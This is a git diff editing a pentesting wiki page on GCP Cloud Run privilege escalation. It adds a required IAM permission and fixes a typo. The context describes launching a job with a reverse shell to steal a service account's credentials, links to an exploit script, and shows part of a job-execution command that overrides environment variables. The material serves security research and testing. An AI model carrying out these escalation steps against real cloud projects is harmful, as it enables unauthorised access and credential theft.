diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md index 4910b0b6a5..a54c7de66d 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md @@ -50,7 +50,7 @@ gcloud run deploy hacked \ Give yourself previous permissions over cloud Run. -### `run.jobs.create`, `run.jobs.run`, (`run.jobs.get`) +### `run.jobs.create`, `run.jobs.run`, `iam.serviceaccounts.actAs`,(`run.jobs.get`) Launch a job with a reverse shell to steal the service account indicated in the command. You can find an [**exploit here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/m-run.jobs.create.sh). @@ -88,7 +88,7 @@ gcloud beta run jobs execute job-name --region --update-env-vars="PYTHO ``` {% endcode %} -### `çrun.jobs.setIamPolicy` +### `run.jobs.setIamPolicy` Give yourself the previous permissions over Cloud Jobs.